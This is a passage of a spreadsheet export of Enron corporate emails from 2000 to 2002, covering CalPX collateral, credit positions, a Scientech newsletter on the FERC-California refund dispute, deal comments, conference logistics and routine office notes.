_x000D_
Enron Power Marketing, Inc. has not restored such collateral.  Please be _x000D_
advised_x000D_
that  the  Preliminary Injunction requires CalPX market participants to _x000D_
maintain_x000D_
their current levels of collateral while the FERC Proceeding and the _x000D_
Preliminary_x000D_
Injunction  are  in  effect,  and  allows CalPX to take any necessary actions _x000D_
to_x000D_
preserve such collateral._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 Jan 2001 06:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sarah.novosel@enron.com', 'travis.mccullough@enron.com', 'rick.buy@enron.com', 'james.steffes@enron.com', 'richard.sanders@enron.com', 'christi.nicolay@enron.com', 'elizabeth.sager@enron.com', 'william.bradford@enron.com', 'richard.shapiro@enron.com', 'wanda.curry@enron.com', 'joe.hartsoe@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Re: Eastern Pools - CREDIT RISK</t>
  </si>
  <si>
    <t xml:space="preserve">The attached spreadsheet details positions by utility, although it is dated _x000D_
11/7/00. EES has executed a number of new deals since then that added _x000D_
regulatory positions._x000D_
_x000D_
---------------------- Forwarded by Vladimir Gorny/HOU/ECT on 01/24/2001 _x000D_
02:18 PM ---------------------------_x000D_
_x000D_
_x000D_
Minal Dalia@EES_x000D_
01/24/2001 01:46 PM_x000D_
To: Vladimir Gorny/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
_x000D_
_x000D_
Here is some position info-- having problems getting the data from the web.  _x000D_
</t>
  </si>
  <si>
    <t>Tue, 25 Sep 2001 09:22:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'issuealerthtml@listserv.scientech.com'})</t>
  </si>
  <si>
    <t>FERC and California ISO Move Closer to Decision on Refund_x000D_
 Issue</t>
  </si>
  <si>
    <t>_x000D_
Today's IssueAlert Sponsors:=20_x000D_
_x000D_
The Center for Public Utilities and The National Association of Regulatory_x000D_
Utility Commissioners present:_x000D_
_x000D_
_x000D_
THE BASICS:=20_x000D_
_x000D_
 &lt;http://cpu.nmsu.edu/&gt;_x000D_
_x000D_
Hands-on framework that shows the interrelationships of the topics and how =_x000D_
they_x000D_
fit together and provides a set of analytical skills required to understand=_x000D_
 the issues.=20_x000D_
October 14-19, 2001 in Albuquerque, NM. Contact Jeanette Walter at=20_x000D_
jeawalte@nmsu.edu &lt;mailto:jeawalte@nmsu.edu&gt; for more information._x000D_
_x000D_
_x000D_
 &lt;http://www.nuclear-gen.com&gt;_x000D_
_x000D_
Infocast's Building New Nuclear Power Plants Conference brings together the=_x000D_
 leading operators, equipment manufacturers, regulators, financial analysts=_x000D_
, and builders of nuclear power plants to one place to discuss the road for=_x000D_
ward for building new nuclear power. Contact Infocast at (818) 888-4444 for=_x000D_
 more information or go to www.nuclear-gen.com &lt;http://www.nuclear-gen.com&gt;=_x000D_
=20_x000D_
_x000D_
_x000D_
  &lt;http://secure.scientech.com/rci/wsimages/scientech_logo_small.jpg&gt;_x000D_
  &lt;http://secure.scientech.com/rci/wsimages/IssueAlert_Logo_188&gt;_x000D_
_x000D_
_x000D_
September 25, 2001=20_x000D_
_x000D_
_x000D_
FERC and California ISO Move Closer to Decision on Refund Issue=20_x000D_
_x000D_
_x000D_
_x000D_
By Will McNamara_x000D_
Director, Electric Industry Analysis=20_x000D_
_x000D_
_x000D_
  &lt;http://secure.scientech.com/rci/wsimages/will100border_copy.jpg&gt;_x000D_
_x000D_
[News item from Reuters] U.S. regulators met with California state energy o=_x000D_
fficials on Sept. 24 as part of ongoing mediation efforts to determine pote=_x000D_
ntial refunds in the Western power market, a spokeswoman for the Federal En=_x000D_
ergy Regulatory Commission (FERC) said. Separately, a House of Representati=_x000D_
ves panel signaled a possible probe into alleged price manipulation by two =_x000D_
government-controlled California bodies that buy power for the state, accor=_x000D_
ding to a memo obtained by Reuters. FERC will facilitate meetings with the =_x000D_
California Independent System Operator (ISO), the California Department of =_x000D_
Water Resources-the state's main power buyer-seven private energy firms, an=_x000D_
d the state's investor-owned utilities. FERC is concerned that "reliability=_x000D_
 is being compromised" on the California power grid, Andrea Wolfman, a lawy=_x000D_
er in FERC's enforcement office, wrote in a letter dated Sept. 17 obtained =_x000D_
by Reuters.=20_x000D_
_x000D_
Analysis: In one of the lingering issues of the California energy crisis th=_x000D_
at has yet to be resolved, FERC, California officials and representatives f=_x000D_
rom out-of-state power generators seem only incrementally closer to reachin=_x000D_
g a consensus on the refund issue, which has been under debate for most of =_x000D_
this year. Two months ago, with California and power generators already loc=_x000D_
ked in a stalemate over the state's demand for $8.9 billion in wholesale el=_x000D_
ectricity refunds, FERC Administrative Law Judge Curtis Wagner halted negot=_x000D_
iations on July 9 and declared that he would draft a refund plan. At that t=_x000D_
ime, Judge Wagner made it clear that, while he had not calculated the amoun=_x000D_
t, refunds would be returned to California and that the vast majority of th=_x000D_
e methodology presented by the California delegation would be adopted in hi=_x000D_
s recommendation. Nevertheless, the issue still remains unresolved and now =_x000D_
faces a new wrinkle: alleged market manipulation on the part of the Califor=_x000D_
nia ISO and Department of Water Resources, the two state agencies with the =_x000D_
biggest hand in wholesale transactions in California.=20_x000D_
_x000D_
It is also important to note at the onset that Judge Wagner disclosed on Ju=_x000D_
ly 9 that power generators had offered a settlement of $716 million, which =_x000D_
California officials flatly refused. Of that amount, reportedly $510 millio=_x000D_
n was offered by the five biggest generators-Duke, Dynegy, Mirant, Reliant,=_x000D_
 and Williams. California's rejection of the offer signaled the end of the =_x000D_
negotiations. In any case, the general message from Judge Wagner was one of=_x000D_
 support for the generators and a belief that any possible refunds would fa=_x000D_
ll closer to a $1-billion level rather than $9 billion. Nevertheless, now t=_x000D_
hat Judge Wagner has made his recommendations to FERC, he has apparently st=_x000D_
epped out of these negotiations.=20_x000D_
_x000D_
In addition to the California ISO and the three California IOUs (Pacific Ga=_x000D_
s &amp; Electric Co., Southern California Edison and San Diego Gas &amp; Electric),=_x000D_
 the seven out-of-state energy companies that are participating in the nego=_x000D_
tiations on refunds are: Calpine (NYSE: CPN), Duke Energy (DUK), Dynegy (DY=_x000D_
N), Enron (ENE), Reliant (REI), Mirant (MIR), and Williams (WMB). All of th=_x000D_
ese companies are subject to potential refunds and as a result have seen th=_x000D_
eir stocks fluctuate on the basis of positive or negative projections. In a=_x000D_
 nutshell, negotiations among the various parties stalled due to quantitati=_x000D_
ve dispute over the amount of money that is owed to California. Gov. Gray D=_x000D_
avis won't budge regarding his claim that generators owe the state nearly $=_x000D_
9 billion. Most of the generators have consented to paying some amount of r=_x000D_
efund, but claim that the figure should be no more than $1 billion as a who=_x000D_
le, adding that any amount above this figure would be unjustified. The wide=_x000D_
 range between the two amounts is what caused the negotiations to hit a bri=_x000D_
ck wall and caused Judge Wagner to assume responsibility for a final recomm=_x000D_
endation to FERC. The stakes in this decision are huge, as Judge Wagner's r=_x000D_
efund plan (and FERC's subsequent ruling based on its own conclusions) will=_x000D_
 undoubtedly set a precedent for how wholesale power is bought and sold in =_x000D_
U.S. markets that are subsequently deregulated.=20_x000D_
_x000D_
The other point of contention for the out-of-state generators is that the C=_x000D_
alifornia ISO has reportedly not yet provided any detailed breakdown of dat=_x000D_
a related to energy consumption by the California IOUs. With what they deem=_x000D_
 as insufficient data in hand, the generating companies are reticent to mak=_x000D_
e any further refunds related to what they may or may not owe the state. Al=_x000D_
so at issue is whether or not previous refund demands made by the state of =_x000D_
California included transactions that were manually completed or transactio=_x000D_
ns that were in the process of being filled, the omissions of which could h=_x000D_
ave artificially inflated the actual refund amount. Further, the generators=_x000D_
 maintain that their prices only reflected market conditions and that they =_x000D_
are still owed billions from the state of California.=20_x000D_
_x000D_
In fairness, the actual dollar amount that the state of California may have=_x000D_
 been overcharged remains ambiguous because, up to this point, power genera=_x000D_
tors have also refused to provide data showing their actual cost of produci=_x000D_
ng power, as this represents competitive information. Rather, all of the pa=_x000D_
rties involved in the negotiations have made presentations to Judge Wagner,=_x000D_
 and naturally have made the best case to support their various positions. =_x000D_
This could all change if the dispute makes its way to a full-blown federal =_x000D_
trial, as power generators (and state officials, for that matter) might be =_x000D_
forced to turn over proprietary operational data.=20_x000D_
_x000D_
Moreover, out-of-state power generators have long been accused of price man=_x000D_
ipulation by Gov. Davis. Now, however, the new claims are being leveled aga=_x000D_
inst the California ISO and the Department of Water Resources. As a reminde=_x000D_
r, the California ISO manages the state's power grid with a mission to ensu=_x000D_
re that the grid is safe and reliable and that there is a competitive marke=_x000D_
t for electricity in California. The Department of Water Resources assumed =_x000D_
the unprecedented role of California's main power purchaser in January 2001=_x000D_
 when the creditworthy status of the three IOUs became questionable. Specif=_x000D_
ically (according to the Reuters report), FERC is concerned that "reliabili=_x000D_
ty is being compromised" on the California power grid by the scheduling and=_x000D_
 dispatch procedures of the California ISO.=20_x000D_
_x000D_
In addition, the buying practices of the Department of Water Resources have=_x000D_
 also been brought into question. The accusation waged against the two agen=_x000D_
cies is essentially that the Department of Water Resources has spent an exo=_x000D_
rbitant amount of money for power through long-term contracts that it estab=_x000D_
lished when electricity prices soared from an average of $30/MWh to over $1=_x000D_
,000/MWh earlier this year. Prices have now fallen to about $50/MWh due to =_x000D_
cooler weather trends and reduced demand. FERC's concern, according to the =_x000D_
memo obtained by Reuters, is that the California ISO is now purchasing surp=_x000D_
lus power from the Department of Water Resources at high prices to protect =_x000D_
Gov. Davis from embarrassment related to the high price that the state is s=_x000D_
till paying for power. These accusations may fall under the investigation o=_x000D_
f the U.S. House Committee on Government Reform, but at least in this inter=_x000D_
im period are another sticking point for FERC in the refund negotiations.=_x000D_
=20_x000D_
_x000D_
However, from my perspective, these new accusations against the California =_x000D_
ISO and Department of Water Resources do represent an entirely separate iss=_x000D_
ue from the refund-from-generators issue. Apart from everything else, the t=_x000D_
imeframe for which the refunds are being assessed is limited to October 200=_x000D_
0 through May 2001. This time period may or may not overlap with any allege=_x000D_
d market manipulation on the part of the two California state agencies. In =_x000D_
any case, this issue will likely be sorted out through legislative interven=_x000D_
tion and will probably be kept separate from the refund issue.=20_x000D_
_x000D_
Although much of this case still remains in contention, some key factors ar=_x000D_
e fairly undisputed. For instance, FERC has established that it is only see=_x000D_
king to establish a ruling based on three key areas: refunds of overcharges=_x000D_
, long-term power contracts, and debts owed to generators by California uti=_x000D_
lities. Also, as noted, it is clear that the time period for which power ge=_x000D_
nerators may ultimately have to issue refunds is October 2000 through May 2=_x000D_
001. Any overcharging that might have occurred outside of this timeframe is=_x000D_
 beyond the scope of this investigation and would not be included in any re=_x000D_
funds made by the generators. It is also important to note that, according =_x000D_
to a report issued by the California Energy Commission, other companies suc=_x000D_
h as Destec and NRG also participate as non-utility generators in the Calif=_x000D_
ornia market and are presumably also under investigation. However, both of =_x000D_
these companies have partnerships with Dynegy, which may have had the more =_x000D_
active role in determining wholesale prices in the state. In addition, FERC=_x000D_
 has previously stated that it would be using its new price methodology as =_x000D_
a basis to determine any potential refunds. The price control methodology, =_x000D_
issued in June 2001, set an initial price ceiling of $107.9/MWh for wholesa=_x000D_
le power sales, which is considerably lower than the average price screen p=_x000D_
ut into place by FERC's original order. Power generators will not be permit=_x000D_
ted to sell above the mitigated prices in the Western markets.=20_x000D_
_x000D_
Regarding the refund dispute, Gov. Davis maintains that the $8.9 billion in=_x000D_
 refunds, a figure that was calculated by the California ISO, is an accurat=_x000D_
e amount and one that is non-negotiable. Davis acknowledges that the figure=_x000D_
 includes potential overcharges from government-run operations such as the =_x000D_
Los Angeles Department of Water and Power (LADWP) and BC Hydro, which FERC =_x000D_
does not regulate. If the municipal utilities are not included in the equat=_x000D_
ion, California officials allege that the power generators listed above col=_x000D_
lectively owe the state around $6 billion. Yet, when considering other West=_x000D_
ern states besides California that may also seek refunds from the power gen=_x000D_
erators, the potential refund claimed by the states could reach as high as =_x000D_
$15 billion. Records provided to Judge Wagner by California officials indic=_x000D_
ate that in January 2001, the first month in which the Department of Water =_x000D_
Resources started to serve as the state's power purchaser, California spent=_x000D_
 about $332 per megawatt-hour for power on the wholesale spot market.=20_x000D_
_x000D_
Typically, the contracts already signed by the governor are in place for 10=_x000D_
 years and were based on higher-than-cost-to-service rates. Some reports ha=_x000D_
ve indicated that the long-term contracts make the state liable for $43 bil=_x000D_
lion in power payments over the next decade. At the time the contracts were=_x000D_
 signed, Davis felt pressure to ensure that California had a reliable suppl=_x000D_
y of power, but he reportedly has been criticized for locking the state int=_x000D_
o expensive, long-term agreements and is eager to renegotiate them. While D=_x000D_
avis is flexible on the various forms that the refunds could take, he has s=_x000D_
aid, "they have to net out close to $8.9 billion." However, some of the pow=_x000D_
er generators that established contracts with the state say re-negotiation =_x000D_
is not possible as they have already locked themselves into deals with natu=_x000D_
ral-gas suppliers.=20_x000D_
_x000D_
_x000D_
An archive list of previous IssueAlerts is available at_x000D_
www.scientech.com &lt;http://secure.scientech.com/issuealert/&gt;=20_x000D_
_x000D_
_x000D_
We encourage our readers to contact us with their comments. We look forward=_x000D_
 to hearing from you. Nancy Spring  &lt;mailto:nspring@scientech.com&gt;_x000D_
_x000D_
Reach thousands of utility analysts and decision makers every day. Your com=_x000D_
pany can schedule a sponsorship of IssueAlert by contacting Jane Pelz  &lt;mai=_x000D_
lto:jpelz@scientech.com&gt;. Advertising opportunities are also available on o=_x000D_
ur Website.=20_x000D_
SCIENTECH is pleased to provide you with your free, daily IssueAlert. Let u=_x000D_
s know if we can help you with in-depth analyses or any other SCIENTECH inf=_x000D_
ormation products. If you would like to refer a colleague to receive our fr=_x000D_
ee, daily IssueAlerts, please reply to this e-mail and include their full n=_x000D_
ame and e-mail address or register directly on our site.=20_x000D_
_x000D_
If you no longer wish to receive this daily e-mail, and you are currently a=_x000D_
 registered subscriber to IssueAlert via SCIENTECH's website, please visit =_x000D_
&lt;http://secure.scientech.com/account/&gt; to unsubscribe. Otherwise, please se=_x000D_
nd an e-mail to to IssueAlert &lt;mailto:IssueAlert@scientech.com&gt;, with "Dele=_x000D_
te IA Subscription" in the subject line.=20_x000D_
SCIENTECH's IssueAlerts(SM) are compiled based on the independent analysis =_x000D_
of SCIENTECH consultants. The opinions expressed in SCIENTECH's IssueAlerts=_x000D_
 are not intended to predict financial performance of companies discussed, =_x000D_
or to be the basis for investment decisions of any kind. SCIENTECH's sole p=_x000D_
urpose in publishing its IssueAlerts is to offer an independent perspective=_x000D_
 regarding the key events occurring in the energy industry, based on its lo=_x000D_
ng-standing reputation as an expert on energy issues.=20_x000D_
_x000D_
_x000D_
_x000D_
Copyright 2001. SCIENTECH, Inc. All rights reserved._x000D_
_x000D_
_x000D_
  &lt;http://infostore.consultrci.com/spacerdot.gif?IssueAlert=3D9/25/2001&gt;</t>
  </si>
  <si>
    <t>Sun, 29 Oct 2000 05:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>New El Paso Trading Schedules</t>
  </si>
  <si>
    <t>Dear Group,_x000D_
_x000D_
Beginning Monday October 30, EPE Marketing would like to take over the phones _x000D_
half an hour later and give the phones back to us half an hour later.  That _x000D_
would mean that they take the phones over at 6:30 PST and return them to us _x000D_
at 14:30 PST.  EPE Marketing believes that this time change will allow them _x000D_
to be better prepared when they begin trading, and will provide better flow _x000D_
when we hand over the phone.  If you have questions or comments concerning _x000D_
the future of this change, please voice them._x000D_
_x000D_
Bill</t>
  </si>
  <si>
    <t>Wed, 27 Feb 2002 11:24:51 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Transport Proposal for TW on NNG</t>
  </si>
  <si>
    <t>Steve, here is the electronic version of the NNG proposal._x000D_
 _x000D_
Kim._x000D_
-----Original Message-----_x000D_
From: Jo.Williams@dynegy.com [mailto:Jo.Williams@dynegy.com]_x000D_
Sent: Friday, February 22, 2002 1:51 PM_x000D_
To: Watson, Kimberly_x000D_
Subject: Transport Proposal for TW on NNG_x000D_
_x000D_
_x000D_
_x000D_
-----Forwarded by Jo Williams/NNG/Dynegy on 02/22/2002 01:51PM -----_x000D_
_x000D_
To: steve.harris@enron.com, kim.watson@enron.com_x000D_
From: Jo Williams/NNG/Dynegy_x000D_
Date: 02/22/2002 01:46PM_x000D_
cc: Vernon Mercaldo/NNG/Dynegy, John Pritchard/NNG/Dynegy_x000D_
Subject: Transport Proposal for TW on NNG_x000D_
_x000D_
_x000D_
Please see attached proposal per our discussion regarding transportation on NNG.  Please call to discuss when you have a few minutes.  I intend to be in Houston next Wednesday, if you would like to discuss in person.  Let me know if you have a few minutes and I will try and meet up with you.</t>
  </si>
  <si>
    <t>Wed, 1 Nov 2000 06:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'timothy.blanchard@enron.com', 'amir.ahanchian@enron.com', 'brian.hoskins@enron.com', 'luis.mena@enron.com', 'jeffrey.gossett@enron.com', 'nick.hiemstra@enron.com', 'kenneth.shulklapper@enron.com', 'matthew.lenhart@enron.com'})</t>
  </si>
  <si>
    <t>Game Tonight @ 9</t>
  </si>
  <si>
    <t>There are no rainouts in this league - so try to show up by 8:30</t>
  </si>
  <si>
    <t>Fri, 18 Aug 2000 03:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Clickpaper Credit Approvals 8/18/00</t>
  </si>
  <si>
    <t>----- Forwarded by Tana Jones/HOU/ECT on 08/18/2000 10:00 AM -----_x000D_
_x000D_
	Tom Moran_x000D_
	08/18/2000 09:55 AM_x000D_
		 _x000D_
		 To: Camille Gerard/Corp/Enron@ENRON, Jarrod Cyprow/HOU/ECT@ECT, Michelle _x000D_
Bruce/HOU/ECT@ECT, Mary G Gosnell/HOU/ECT@ECT, Samuel Schott/HOU/ECT@ECT, _x000D_
Adnan Patel/Corp/Enron@ENRON, Tanya Rohauer/HOU/ECT@ECT, Paul _x000D_
Radous/Corp/Enron@ENRON, Tom Moran/HOU/ECT@ECT, Bradley Diebner/HOU/ECT@ECT, _x000D_
Tana Jones/HOU/ECT@ECT, Karen Lambert/HOU/ECT@ECT, Stacey _x000D_
Richardson/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Clickpaper Credit Approvals 8/18/00_x000D_
_x000D_
_x000D_
_x000D_
Attached are the Clickpaper Credit Approvals for 8/18/00._x000D_
_x000D_
_x000D_
_x000D_
Regards,_x000D_
tm</t>
  </si>
  <si>
    <t>Fri, 14 Apr 2000 08:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Energy in Europe Congress 2000</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 04/14/2000 _x000D_
03:52 PM ---------------------------_x000D_
_x000D_
_x000D_
Tanuja Tulsiani &lt;ttulsi@IIRLTD.CO.UK&gt; on 03/30/2000 04:39:22 AM_x000D_
To: Ttulsi@IIRLTD.CO.UK_x000D_
cc:  _x000D_
Subject: Energy in Europe Congress 2000_x000D_
_x000D_
_x000D_
 Dear Energy in Europe Congress Delegate_x000D_
_x000D_
ENERGY IN EUROPE CONGRESS 2000_x000D_
19th June * 22th June 2000 * Kempinski Hotel , Berlin_x000D_
_x000D_
I am delighted that you will be joining us to speak at our Energy in _x000D_
Europe2000 conference (formally known as Electricity in Europe Congress) and _x000D_
enclose copies of the printed brochure for you and your colleagues. I hope _x000D_
that you will agree that the programme looks excellent and the response so _x000D_
far indicates that the event will be extremely well attended._x000D_
_x000D_
I would be grateful if you could just take a moment to look through the items _x000D_
we would like from you prior to the conference to help ensure everything runs _x000D_
smoothly on the day._x000D_
_x000D_
Your Administration/Preparation Details_x000D_
12 weeks to go!_x000D_
_x000D_
You will find attached:_x000D_
  ? PINK FORM : please tick and fill in and fax back immediately_x000D_
? HOTEL FORM: please tick and fill in and fax direct to the hotel_x000D_
? MARKETING.DOC: Information for out marketing department, please fill in and _x000D_
send back as soon as possible_x000D_
_x000D_
Friday 26th May 2000 : A Hard Copy Of Your Documentation_x000D_
3 weeks to go!_x000D_
_x000D_
  ? We would like a hard black &amp; white copy of  your presentation / bullet _x000D_
points/copy of slides whichever is best for you, to insert into the delegate _x000D_
documentation. We can receive this by post or email if the documents are not _x000D_
too complex but we try not to insert fax copies as copy quality is poor. _x000D_
(e-mail address - ttulsi@icbi.co.uk)._x000D_
_x000D_
N.B. Even if you plan to speak off the cuff, we would urge that you submit at _x000D_
least an outline of your speech to us for insertion into the delegate pack by _x000D_
the above date. The most consistent complaint that we have from delegates is _x000D_
that not all speakers offer hard copies of their presentation._x000D_
_x000D_
  ? If you are unable to make this deadline, please could you inform us as _x000D_
soon as possible so that we can make alternative arrangements and avoid _x000D_
printing delay._x000D_
_x000D_
Under separate cover we have arranged for five brochures to be sent to you _x000D_
outlining the full programme.  These should arrive very shortly._x000D_
_x000D_
Should you have any queries regarding your participation at the conference _x000D_
please contact Tanuja Tulsiani, our Logistics  Manager who will be looking _x000D_
after the 'domestic' side of the event. You can call her direct on (44) 171 _x000D_
915 5173 or do contact myself. Thank you once again for joining us and I look _x000D_
forward to seeing you in the Berlin._x000D_
_x000D_
With kind regards,_x000D_
_x000D_
_x000D_
Alexandra Howells_x000D_
Director_x000D_
Energy in Europe Congress 200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 hotel form.doc_x000D_
 - Pink form.doc_x000D_
 - marketing.doc_x000D_
</t>
  </si>
  <si>
    <t>Fri, 15 Dec 2000 08:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>WTI trading simulation presentation</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 12/15/2000 _x000D_
04:22 PM ---------------------------_x000D_
_x000D_
_x000D_
Zimin Lu_x000D_
12/15/2000 03:11 PM_x000D_
To: John J Lavorato/Corp/Enron@Enron_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT, Stinson Gibner/HOU/ECT@ECT _x000D_
Subject: WTI trading simulation presentation_x000D_
_x000D_
_x000D_
_x000D_
John,_x000D_
_x000D_
I prepared the presentation in the way we discussed on Wednesday. _x000D_
In summary I have included the following scenarios:_x000D_
_x000D_
Tenor:  1, 3, 5 years back from Nov, 2000_x000D_
               1, 3, 5 years back from Nov, 1998_x000D_
               1, 3, 5 years back from Nov. 1995_x000D_
_x000D_
Number of trade per day:  200, 600,1000_x000D_
_x000D_
Bid-offer spread:  $0.04 and $0.06_x000D_
_x000D_
Net Open position allowed: 1,000,000 and 5,000,000_x000D_
_x000D_
Volume per trade is fixed at 1,000 BBL._x000D_
_x000D_
All together, there are 9*12 =  108 scenarios included in the presentation._x000D_
_x000D_
I will be on vocation starting next week.  But I will check my e-mail and _x000D_
phone_x000D_
messages to make modifications you need.    _x000D_
_x000D_
Happy Holidays,_x000D_
_x000D_
Zimin_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 06:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Enron default swaps</t>
  </si>
  <si>
    <t>Hi Vince!_x000D_
_x000D_
I got those notes. They should indeed_x000D_
be useful. The one from Deutsche Bank_x000D_
is especially helpful!_x000D_
_x000D_
I am suppose to know this stuff, as I teach it!_x000D_
_x000D_
Sorry about the delayed billing._x000D_
I have had trouble getting a bill_x000D_
from my excellent asistant, Taichi Hoshino,_x000D_
who has returned to Goldman Tokyo,_x000D_
and has not been able to get anything else_x000D_
done lately. I will try to get something out soon!_x000D_
_x000D_
We had several energy people,_x000D_
from several companies, at our credit risk_x000D_
exec ed course last month. Seems that_x000D_
credit risk and  power risk go_x000D_
together these days!_x000D_
_x000D_
Warm regards, Darrell_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
On Fri, 30 Mar 2001 Vince.J.Kaminski@enron.com wrote:_x000D_
_x000D_
&gt;_x000D_
&gt; Darrell,_x000D_
&gt;_x000D_
&gt; I am sending you 2 technical notes on Enron default swaps: I hope that they_x000D_
&gt; will_x000D_
&gt; be useful. I shall read the articles on weekend. I am curious if you_x000D_
&gt; find these explanations satisfactory._x000D_
&gt;_x000D_
&gt; We are very slow in preparing a number of technical documents_x000D_
&gt; for you for model reviews. We still hope you will be able_x000D_
&gt; to find some time to review our credit models (for our London_x000D_
&gt; credit trading) and  VaR and option pricing related models._x000D_
&gt;_x000D_
&gt; Also, please check your invoices. I still think we owe you money._x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Vince_x000D_
&gt;  (See attached file: CDS vs AS.pdf)(See attached file: cdsstrat.pdf)_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Darrell Duffie &lt;duffie@stanford.edu&gt; on 03/28/2001 08:07:38 AM_x000D_
&gt;_x000D_
&gt; To:   Vince J Kaminski &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
&gt; cc:_x000D_
&gt; Subject:  Re: Enron default swaps_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Vince: According to a Bank of America_x000D_
&gt; publication, your (Enron) default swap spreads_x000D_
&gt; are consistently trading about 80_x000D_
&gt; basis points wider than your asset swaps._x000D_
&gt; Any idea of what is going on here?_x000D_
&gt;_x000D_
&gt; Thanks for any guidance, Darrell_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; ______________________________________________x000D_
&gt; Darrell Duffie_x000D_
&gt; mail  GSB Stanford CA 94305-5015 USA_x000D_
&gt; phone 650 723 1976_x000D_
&gt; fax   650 725 7979_x000D_
&gt; email duffie@stanford.edu_x000D_
&gt; web   http://www.stanford.edu/~duffie/_x000D_
&gt; ______________________________________________x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
______________________________________________x000D_
Darrell Duffie_x000D_
mail  GSB Stanford CA 94305-5015 USA_x000D_
phone 650 723 1976_x000D_
fax   650 725 7979_x000D_
email duffie@stanford.edu_x000D_
web   http://www.stanford.edu/~duffie/_x000D_
_____________________________________________</t>
  </si>
  <si>
    <t>Mon, 5 Feb 2001 06:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>SPA- Comments</t>
  </si>
  <si>
    <t xml:space="preserve">I'm having copies made of the due diligence binders._x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 02/05/2001 02:44 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Fred Mitro@ECT_x000D_
01/31/2001 08:41 AM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc: Rusty Stevens/Corp/Enron@ENRON _x000D_
_x000D_
Subject: SPA- Comments_x000D_
_x000D_
Kay:_x000D_
_x000D_
Here are my comments on the draft Kendall SPA:_x000D_
_x000D_
1.  I assume that we are preparing a separate SPA for Kendall New Century _x000D_
Development, LLC and Titan Land Development Company, LLC.  I will deliver a _x000D_
project binder on Titan to your office this morning.  _x000D_
_x000D_
2.  Section 2.1 Purchase Price:  The Purchase Price in the Kendall SPA should _x000D_
be $3,000,000.00.  The Purchase Price in the Titan SPA should be _x000D_
$6,000,000.00._x000D_
_x000D_
3.  Section 2.2 Termination Date:  I would like to propose March 15, 2001 as _x000D_
a [Kendall]Termination Date.  If PSEG and ENA can agree on the form of the _x000D_
document and sign within the next  2-3 weeks, that would leave a 3 week _x000D_
window prior to the Termination Date.  This seems like plenty of time to _x000D_
arrange the wire transfer and set-up the transfer of the member interests. _x000D_
(Do you see any problem with this timeline?)._x000D_
_x000D_
4.  Section 7.1(b) Purchaser Indemnification:  The agreements states _x000D_
$3,500,000.  Shouldn't this number be $3,000,000 (equal to the Purchase _x000D_
Price)._x000D_
_x000D_
5.  Page A-2:  The Purchaser signature block currently reads Coastal Power _x000D_
Corporation.  This should read [Purchaser]._x000D_
_x000D_
 I would like to deliver the Kendall SPA to PSEG as soon as possible.  Please _x000D_
forward me an [Kendall] electronic version once the changes have been made. _x000D_
Let me know the timing on a draft SPA for Titan LLC. _x000D_
_x000D_
Thanks,_x000D_
Fred_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 12:16:32 -0700 (PDT)</t>
  </si>
  <si>
    <t>PIRA's Current News &amp; Analysis</t>
  </si>
  <si>
    <t xml:space="preserve">Dear PIRA Retainer Client:_x000D_
_x000D_
The following Current News &amp; Analysis articles have been published on_x000D_
PIRA's website:_x000D_
_x000D_
1) Asia: Weak Economic Outlook &amp; High Oil Inventories Are A Bad Recipe_x000D_
For Oil Markets_x000D_
2) Brazil Oil Market Profile: Slide Show_x000D_
_x000D_
Please go to http://www.pira.com_x000D_
_x000D_
These articles can be found in the Client section of PIRA's website. You_x000D_
will need a PIRA Online account in order to gain access. For account_x000D_
information please contact Dyana Rothman, drothman@pira.com_x000D_
_x000D_
Best regards,_x000D_
_x000D_
PIRA Energy Group_x000D_
</t>
  </si>
  <si>
    <t>Wed, 31 Jan 2001 00:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'brooklyn.couch@enron.com'})</t>
  </si>
  <si>
    <t>Re: FWD: GET IT WHILE IT's HOT!! 2001 Calendar</t>
  </si>
  <si>
    <t xml:space="preserve">I'm in._x000D_
_x000D_
_x000D_
_x000D_
To: Becky Pitre/HOU/ECT@ECT_x000D_
cc: Shannon McPearson/HOU/ECT@ECT, Robin Rodrigue/HOU/ECT@ECT _x000D_
Subject: Re: FWD: GET IT WHILE IT's HOT!! 2001 Calendar  _x000D_
_x000D_
That works for me._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Becky Pitre@ECT_x000D_
01/31/2001 07:58 AM_x000D_
To: Brooklyn Couch/HOU/EES@EES_x000D_
cc: Shannon McPearson/HOU/ECT@ECT, Robin Rodrigue/HOU/ECT@ECT _x000D_
Subject: Re: FWD: GET IT WHILE IT's HOT!! 2001 Calendar  _x000D_
_x000D_
OK, I smelled Luthers this morning.  It was killing me.  Yum, yum.  How about _x000D_
